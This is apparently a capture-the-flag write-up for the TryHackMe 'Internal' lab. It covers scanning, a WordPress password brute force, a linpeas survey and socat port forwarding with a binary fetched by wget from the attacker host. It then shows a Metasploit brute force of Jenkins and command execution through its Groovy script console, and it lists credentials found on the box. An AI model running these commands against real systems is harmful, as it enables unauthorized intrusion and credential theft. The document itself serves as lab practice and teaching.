THM - Internal
Summary
Config
sudo vim /etc/hosts*
10.10.102.246 internal.thm
System info
- Apache/2.4.29 (Ubuntu)
- Linux version 4.15.0-112-generic
- Distributor ID: Ubuntu
- Description: Ubuntu 18.04.4 LTS
- Release: 18.04
- Codename: bionic
System User - a
USER: aubreanna PASSWORD: bubbxxxxxxx123
System User - root
USER: root PASSWORD: tr0xxxxxx123
WordPress
- VERSION: 5.4.2
- USER: admin
- PASSWORD: my2boys
Phpmyadmin
- VERSION: 4.6.6deb5
- URL: http://internal.thm/phpmyadmin/index.php
- USER: wordpress
- PASS: wordpress123
Jenkins
USER: admin PASSWORD: sxxxxxx
Configuration
cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 internal
nmap
nmap -sC -sV -p- internal.thm
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
gobuster dir
gobuster dir --url http://internal.thm/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir --url http://internal.thm/blog/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 20
gobuster dir --url http://internal.thm/phpmyadmin/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 20
- http://internal.thm/ (Apache2 Ubuntu Default Page)
- http://internal.thm/blog/ (WordPress)
- http://internal.thm/blog/wp-admin
- http://internal.thm/blog/wp-content
- http://internal.thm/blog/wp-includes
- http://internal.thm/blog/index.php/wp-json/wp/v2/users
- http://internal.thm/blog/index.php/wp-json/wp/v2/users/1
- http://internal.thm/javascript/ - 403
- http://internal.thm/javascript/prototype/ -403
- http://internal.thm/javascript/scriptaculous/ - 403
- http://internal.thm/javascript/jquery/ - 403
- http://internal.thm/phpmyadmin/ - (phpmyadmin) (4.6.6deb5)
- http://internal.thm/phpmyadmin/templates - 403
- http://internal.thm/phpmyadmin/themes/ - 403
- http://internal.thm/phpmyadmin/libraries/ - 403
- http://internal.thm/phpmyadmin/setup/ - 401
- http://internal.thm/phpmyadmin/sql/ - 403
- http://internal.thm/phpmyadmin/js/ - 403
- http://internal.thm/phpmyadmin/locale/ - 403
- http://internal.thm/server-status/ 403
- http://internal.thm/blog/ (WordPress)
gobuster vhost
gobuster vhost -u http://internal.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
- gc._msdcs.internal.thm
- _domainkey.internal.thm
- mailing._domainkey.sunnynews.internal.thm
- mailing._domainkey.info.internal.thm
- hallam_dev.internal.thm
- hallam_ad.internal.thm
- wm_j_b__ruffin.internal.thm
- 2609_n_www.internal.thm
- 0907_n_hn.m.internal.thm
- 0507_n_hn.internal.thm
- faitspare_mbp.cit.internal.thm
- sb_0601388345bc6cd8.internal.thm
- sb_0601388345bc450b.internal.thm
- api_portal_dev.internal.thm
- api_web_dev.internal.thm
- api_webi_dev.internal.thm
- sklep_test.internal.thm
feroxbuster
feroxbuster --url http://internal.thm -s 200 -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
200 GET 375l 964w 10918c http://internal.thm/ 200 GET 328l 3640w 0c http://internal.thm/blog/ 200 GET 0l 0w 0c http://internal.thm/blog/wp-content/ 200 GET 0l 0w 0c http://internal.thm/blog/wp-content/plugins/ 200 GET 26l 359w 0c http://internal.thm/phpmyadmin/
- http://internal.thm
- http://internal.thm/
- http://internal.thm/icons/
- http://internal.thm/blog/
- http://internal.thm/icons/small/
- http://internal.thm/javascript/
- http://internal.thm/blog/wp-content/
- http://internal.thm/blog/wp-includes/
- http://internal.thm/blog/wp-includes/images/
- http://internal.thm/blog/wp-includes/assets/
- http://internal.thm/blog/wp-includes/css/
- http://internal.thm/blog/wp-includes/js/
- http://internal.thm/blog/wp-includes/blocks/
- http://internal.thm/blog/wp-includes/widgets/
- http://internal.thm/blog/wp-content/plugins/
- http://internal.thm/blog/wp-includes/fonts/
- http://internal.thm/blog/wp-includes/customize/
- http://internal.thm/phpmyadmin/
- http://internal.thm/phpmyadmin/sql/
wpscan
Scan for password
wpscan --url http://internal.thm/blog --passwords /usr/share/wordlists/rockyou.txt --proxy http://localhost:8080
- Username: admin
- Password: xxxxxx
Scan for info
wpscan --url http://internal.thm/blog --api-token=.....
- [+] Headers Server: Apache/2.4.29 (Ubuntu)
- [+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
- [+] WordPress readme found: http://internal.thm/blog/readme.html
- [+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
- [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
- [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
- [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
- [!] Title: WordPress 5.4 to 5.8 - Lodash Library Update
- [!] Title: WordPress 5.4 to 5.8 - Authenticated XSS in Block Editor
- [!] Title: WordPress 5.4 to 5.8 - Data Exposure via REST API
- [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
- [!] Title: WordPress < 5.8 - Plugin Confusion
- [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
- [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
- [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
- [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites
- [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
- [+] WordPress theme in use: twentyseventeen
.linpeas.sh scan as www-data user
www-data@internal:/tmp$ ./linpeas.sh
Basic information
- OS: Linux version 4.15.0-112-generic
- User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
- Hostname: internal
- Writable folder: /dev/shm
- Distributor ID: Ubuntu
- Description: Ubuntu 18.04.4 LTS
- Release: 18.04
- Codename: bionic
- Sudo version 1.8.21p2
- /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
- New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
Container related tools present
- /usr/bin/docker
- /usr/bin/lxc
- /usr/sbin/runc
Processes, Crons, Timers, Services and Sockets
... ==aubrean+ 1452 0.0 0.0 1148 4 ? Ss 12:15 0:00 _ /sbin/tini -- /usr/local/bin/jenkins.sh== ==aubrean+ 1494 0.4 12.3 2587808 251972 ? Sl 12:15 0:24 _ java -Duser.home=/var/jenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -jar /usr/share/jenkins/jenkins.war== root 1419 0.0 0.1 404800 3464 ? Sl 12:15 0:00 _ /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8080 -container-ip 172.17.0.2 -container-port 8080 ...
Hostname, hosts and DNS
internal 127.0.0.1 localhost 127.0.1.1 internal
Active Ports
(netstat -punta || ss --ntpu)
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:39091 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Users Information
uid=33(www-data) gid=33(www-data) groups=33(www-data)
All users & groups
uid=0(root) gid=0(root) groups=0(root) uid=1000(aubreanna) gid=1000(aubreanna) groups=1000(aubreanna),4(adm),24(cdrom),30(dip),46(plugdev) uid=111(mysql) gid=114(mysql) groups=114(mysql) uid=33(www-data) gid=33(www-data) groups=33(www-data)
Useful software
- /usr/bin/base64
- /usr/bin/ctr
- /usr/bin/curl
- /usr/bin/docker
- /usr/bin/lxc
- /bin/nc
- /bin/netcat
- /usr/bin/perl
- /usr/bin/php
- /bin/ping
- /usr/bin/python
- /usr/bin/python2
- /usr/bin/python2.7
- /usr/bin/python3
- /usr/bin/python3.6
- /usr/sbin/runc
- /usr/bin/sudo
- /usr/bin/wget
Installed Compilers
- /snap/core/8268/usr/share/gcc-5
- /snap/core/9665/usr/share/gcc-5
- /usr/share/gcc-8
Analyzing Wordpress Files (limit 70)
- -rw-r--r-- 1 root root 3109 Aug 3 2020 /var/www/html/wordpress/wp-config.php
- define( 'DB_NAME', 'wordpress' );
- define( 'DB_USER', 'wordpress' );
- define( 'DB_PASSWORD', 'wordxxxxxx' );
- define( 'DB_HOST', 'localhost' );
hosts.allow
/etc/hosts.allow
Message in txt file
cat /opt/wp-save.txt
Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb1xxxxxx
access to internal resources
Dump configuration
netstat -tulpn | grep LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0: LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0: LISTEN -
tcp 0 0 127.0.0.1:45619 0.0.0.0: LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0: LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0: LISTEN -
tcp6 0 0 :::80 ::: LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Use socat to port forwarding
Template
socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> &
Source of socat binary (hacker machine)
git clone https://github.com/andrew-d/static-binaries
cd static-binaries/binaries/linux/x86_64
python3 -m http.server
Get socat and run (target machine)
wget 10.18.9.175:8000/socat
chmod +x socat
./socat TCP-LISTEN:8081,fork TCP:0.0.0.0:8080 &
New target jenkins
URL
http://internal.thm:8081/
Scan for version
use auxiliary/scanner/http/jenkins_enum
setg RHOSTS internal.thm
setg RPORT 8081
setg TARGETURI /
show options
run
[+] 10.10.140.111:8081 - Jenkins Version 2.250
Scan for password
use auxiliary/scanner/http/jenkins_login
setg RHOSTS internal.thm
setg RPORT 8081
setg PASS_FILE /usr/share/wordlists/rockyou.txt
setg USERNAME admin
setg STOP_ON_SUCCESS true
show options
[+] 10.10.158.66:8081 - Login Successful: admin:spongebob
Use jenkins script
- http://internal.thm:8081/script
println 'whoami'.execute().text
println 'ls -la /'.execute().text
println 'ls -la /home'.execute().text
println 'ls -la /root'.execute().text
println 'ls -la /opt'.execute().text
println 'cat /opt/note.txt'.execute().text
root:tr0ub1xxxxx